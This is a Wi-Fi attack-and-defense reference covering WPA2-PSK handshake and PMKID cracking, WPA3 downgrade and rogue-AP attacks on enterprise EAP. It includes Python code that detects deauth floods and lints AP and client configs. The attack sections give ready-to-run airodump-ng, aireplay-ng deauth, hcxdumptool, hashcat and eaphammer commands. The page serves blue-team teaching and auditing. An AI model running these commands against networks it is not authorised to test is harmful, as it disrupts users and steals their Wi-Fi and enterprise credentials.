
Wi-Fi Attack & Detection.

Wireless attack surface across WPA2/WPA3 and enterprise EAP variants, with the practical detection telltales for each technique.

WPA2-PSK — handshake capture and crack

  1. Monitor mode. airmon-ng check kill && airmon-ng start wlan0. Stops NetworkManager from kicking the interface.
  2. Recon. airodump-ng wlan0mon. Note BSSID, channel, connected clients.
  3. Targeted capture. airodump-ng -c CH --bssid BSSID -w cap wlan0mon. Wait for handshake (organic) or deauth one client: aireplay-ng --deauth 5 -a BSSID -c CLIENT wlan0mon.
  4. PMKID fallback. hcxdumptool -i wlan0mon -o cap.pcapng --enable_status=1. Single-frame capture, no clients needed if AP supports PMKID.
  5. Convert. hcxpcapngtool -o hash.hc22000 cap.pcapng.
  6. Crack — wordlist + rule. hashcat -m 22000 hash.hc22000 rockyou.txt -r OneRuleToRuleThemAll.rule -O.
  7. Crack — mask. If you know the SSID convention has a phone number suffix: hashcat -m 22000 hash.hc22000 -a 3 SSID?d?d?d?d?d?d?d.

WPA3 / SAE

  • Different shape. SAE = Simultaneous Authentication of Equals. No four-way handshake to capture; offline brute is not the path.
  • Dragonblood downgrade. Forced WPA2 fallback in transition mode (mixed WPA2/WPA3) → capture WPA2 handshake, crack as usual.
  • Side-channel. Original Dragonblood timing side-channel patched in modern hostapd, but configuration-error variants still seen in legacy embedded.
  • Defense. WPA3-only mode (no transition). hostapd ≥ 2.10. Don't run WPA3 on hardware that lacks the side-channel fixes.

Enterprise — EAP variants

  • PEAP-MSCHAPv2 (most common, weakest). Client sees server cert, validates if configured. Misconfigured client (no CA pin, "Trust Any Cert" checked) → rogue-AP captures challenge/response → offline brute the NTLM hash.
  • EAP-TTLS-PAP. Plaintext password inside TLS tunnel. Same rogue-AP attack → plaintext credentials directly.
  • EAP-TLS. Mutual cert auth. No password to capture. Operational cost: PKI infrastructure, cert lifecycle. Hardest to break, easiest to operate badly.
  • Rogue-AP toolchain. eaphammer -i wlan0mon --essid CORP --auth wpa-eap --creds stands up rogue with same SSID + cert. Client roams.

Detection telltales for the blue team

  • Deauth frames. Floods of management-frame deauths from non-AP MACs. Wireless IDS (Aruba, Cisco WIPS) detects.
  • Rogue AP with same SSID. Signal-strength anomaly: known APs at known floors, sudden new AP with same SSID at unexpected location/signal.
  • EAP from unexpected supplicants. RADIUS logs show EAP attempts from unknown calling-station-ID (MAC).
  • PMKID requests. hcxdumptool-style PMKID probes leave a recognizable pattern on AP logs if AP exports them.
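Two of the telltales above (deauth floods and EAP from unexpected supplicants) reduce to simple log logic. The following is an added example, not code from the page: it runs a sliding-window deauth counter and an inventory check over constructed sample exports. The log layouts, MAC addresses, the 10-second window and the threshold of 5 are all assumptions, not any WIDS sensor's or RADIUS server's real format.

```python
# Added example (not from the original page): detection logic for two of the
# telltales above, run over constructed sample logs. Log formats, MAC addresses
# and thresholds are assumptions, not any sensor's or RADIUS server's real export.
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Inventory of legitimate AP BSSIDs and enrolled supplicant MACs (constructed).
KNOWN_BSSIDS = {"00:11:22:33:44:55", "00:11:22:33:44:66"}
KNOWN_STATIONS = {"AA-BB-CC-DD-EE-01", "AA-BB-CC-DD-EE-02"}

# Constructed management-frame export: ISO time, subtype, source MAC, destination MAC.
# One deauth from the real AP is normal; a burst from a non-AP MAC is the telltale.
FRAME_LOG = """\
2024-05-01T10:00:00 beacon 00:11:22:33:44:55 ff:ff:ff:ff:ff:ff
2024-05-01T10:00:01 deauth 00:11:22:33:44:55 aa:bb:cc:dd:ee:01
2024-05-01T10:00:02 deauth de:ad:be:ef:00:01 aa:bb:cc:dd:ee:01
2024-05-01T10:00:02 deauth de:ad:be:ef:00:01 aa:bb:cc:dd:ee:01
2024-05-01T10:00:03 deauth de:ad:be:ef:00:01 aa:bb:cc:dd:ee:01
2024-05-01T10:00:03 deauth de:ad:be:ef:00:01 aa:bb:cc:dd:ee:01
2024-05-01T10:00:04 deauth de:ad:be:ef:00:01 aa:bb:cc:dd:ee:01
2024-05-01T10:00:05 probe-req aa:bb:cc:dd:ee:02 ff:ff:ff:ff:ff:ff
"""

# Constructed RADIUS request export; the field layout is an assumption.
RADIUS_LOG = """\
2024-05-01T10:01:00 Access-Request user=alice nas=ap-floor2 calling_station_id=AA-BB-CC-DD-EE-01 eap=PEAP
2024-05-01T10:01:05 Access-Request user=bob nas=ap-floor2 calling_station_id=AA-BB-CC-DD-EE-02 eap=PEAP
2024-05-01T10:01:09 Access-Request user=alice nas=ap-floor3 calling_station_id=DE-AD-BE-EF-00-02 eap=PEAP
"""


def detect_deauth_floods(log, window_s=10, threshold=5):
    """Alert once per source MAC that sends >= threshold deauths within window_s seconds.
    Each alert records whether the source is a known BSSID, so a flood spoofing the
    real AP's address is still reported, just labelled differently."""
    recent = defaultdict(deque)
    alerted, alerts = set(), []
    for line in log.splitlines():
        ts_s, subtype, src, _dst = line.split()
        if subtype != "deauth":
            continue
        ts = datetime.fromisoformat(ts_s)
        window = recent[src]
        window.append(ts)
        while ts - window[0] > timedelta(seconds=window_s):   # slide the window
            window.popleft()
        if len(window) >= threshold and src not in alerted:
            alerted.add(src)
            alerts.append({"src": src, "count": len(window),
                           "known_ap": src in KNOWN_BSSIDS,
                           "first_seen": window[0].isoformat()})
    return alerts


def find_unknown_supplicants(log, known=KNOWN_STATIONS):
    """Return (user, calling-station-id, NAS) for EAP attempts from MACs not in inventory.
    A known user name arriving from an unknown MAC is what a credential harvested
    by a rogue AP looks like when it is later used against the real network."""
    hits = []
    for line in log.splitlines():
        fields = dict(f.split("=", 1) for f in line.split()[2:])
        mac = fields.get("calling_station_id", "").upper()
        if "eap" in fields and mac not in known:
            hits.append((fields["user"], mac, fields["nas"]))
    return hits


if __name__ == "__main__":
    for alert in detect_deauth_floods(FRAME_LOG):
        print("deauth flood:", alert)
    for hit in find_unknown_supplicants(RADIUS_LOG):
        print("EAP from unknown station:", hit)
```

The single deauth from the real AP at 10:00:01 is below threshold and stays quiet; the five from the non-AP MAC in three seconds raise one alert. On the RADIUS side, alice's second attempt from a MAC that is not in inventory is the hit; the threshold and window should be tuned against your own baseline, since some client chipsets and roaming behaviour produce legitimate deauth bursts.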

Defense — what actually works

  • PSK ≥ 20 random chars. Otherwise the rockyou+rules pass cracks it.
  • WPA3-only. Drop WPA2 if your client fleet supports it.
  • EAP-TLS or PEAP with strict client validation. Lock the cert pin; reject any cert not from your CA. Test the lock by standing up a rogue with self-signed cert and confirming clients refuse.
  • MFP (Management Frame Protection). Defeats deauth attacks. 802.11w; default in WPA3, optional in WPA2.
  • Wireless IDS deployed and tuned. Untuned WIDS is a checkbox; tuned WIDS catches rogue-AP and deauth floods.

Rule of thumb: Most wireless wins still come from misconfigured WPA2-Enterprise clients ("Trust Any Cert" toggled on for convenience), not from cryptographic weaknesses. Audit the client-side trust configuration, not just the AP-side protocol.
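The AP-side defenses (WPA3-only, MFP required, long PSK) and the client-side trust configuration the rule of thumb points at can be checked mechanically. This is an added example, not the page's or hostapd's own tooling: a minimal lint over hostapd.conf and wpa_supplicant network blocks, with a weak and a hardened version of each embedded as constructed samples. The config keys (wpa_key_mgmt, ieee80211w, ca_cert, domain_suffix_match, and so on) are real hostapd/wpa_supplicant keys; the SSIDs, the CA path and the RADIUS host name are placeholders, and the parser handles only flat key=value lines, not the full config grammar.

```python
# Added example (not from the original page): audit hostapd and wpa_supplicant
# configs for the weaknesses this page describes. Sample configs are constructed;
# CA path, RADIUS host name and the SAE secret are placeholders.

WEAK_AP = """\
# constructed hostapd.conf: WPA2/WPA3 transition mode, short PSK, MFP optional
interface=wlan0
ssid=CORP-GUEST
wpa=2
wpa_key_mgmt=WPA-PSK SAE
wpa_passphrase=Summer2024!
rsn_pairwise=CCMP
ieee80211w=1
"""

HARDENED_AP = """\
# constructed hostapd.conf: WPA3-only (SAE), 802.11w required
interface=wlan0
ssid=CORP-GUEST
wpa=2
wpa_key_mgmt=SAE
sae_password=REPLACE-WITH-LONG-RANDOM-SECRET
rsn_pairwise=CCMP
ieee80211w=2
sae_require_mfp=1
"""

WEAK_CLIENT = """\
network={
    ssid="CORP"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="alice"
    password="hunter2"
    phase2="auth=MSCHAPV2"
}
"""

HARDENED_CLIENT = """\
network={
    ssid="CORP"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="alice"
    password="hunter2"
    phase2="auth=MSCHAPV2"
    ca_cert="/etc/ssl/certs/corp-ca.pem"
    domain_suffix_match="radius.corp.example"
}
"""


def parse_kv(text):
    """Parse key=value lines (hostapd style, or the inside of a wpa_supplicant
    network={...} block). Comments, braces and surrounding quotes are dropped."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line or line.endswith("{"):
            continue
        key, value = line.split("=", 1)
        conf[key.strip()] = value.strip().strip('"')
    return conf


def audit_hostapd(text):
    """Findings for an AP config, in the page's terms."""
    conf = parse_kv(text)
    findings = []
    key_mgmt = conf.get("wpa_key_mgmt", "WPA-PSK").split()   # hostapd default is WPA-PSK
    if "WPA-PSK" in key_mgmt:
        findings.append("wpa2-psk-enabled")    # WPA2 or transition mode: 4-way handshake is capturable
    if conf.get("ieee80211w", "0") != "2":
        findings.append("mfp-not-required")    # 802.11w off or optional: deauth frames unauthenticated
    psk = conf.get("wpa_passphrase")
    if psk is not None and len(psk) < 20:
        findings.append("short-psk")           # length only; randomness cannot be linted
    return findings


def audit_supplicant(text):
    """Findings for a wpa_supplicant enterprise network block."""
    conf = parse_kv(text)
    findings = []
    if conf.get("key_mgmt") != "WPA-EAP":
        return findings                        # not an enterprise network; nothing to check here
    if "ca_cert" not in conf:
        findings.append("no-ca-cert")          # the config-file equivalent of "Trust Any Cert"
    if not any(k in conf for k in ("domain_suffix_match", "domain_match", "altsubject_match")):
        findings.append("no-domain-match")     # any cert from that CA is accepted, not just the RADIUS server's
    return findings


if __name__ == "__main__":
    for name, text, fn in (("weak AP", WEAK_AP, audit_hostapd), ("hardened AP", HARDENED_AP, audit_hostapd),
                           ("weak client", WEAK_CLIENT, audit_supplicant), ("hardened client", HARDENED_CLIENT, audit_supplicant)):
        print(f"{name}: {fn(text) or 'ok'}")
```

The weak AP trips all three checks, the weak client both; the hardened versions are clean. The domain-match check matters as much as the CA pin: with only ca_cert set, a client accepts any certificate the same CA issued, which for a public CA is the whole internet. The lint is deliberately conservative about what it parses, so run it as one input to the rogue-AP acceptance test the defense list already calls for, not as a replacement.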
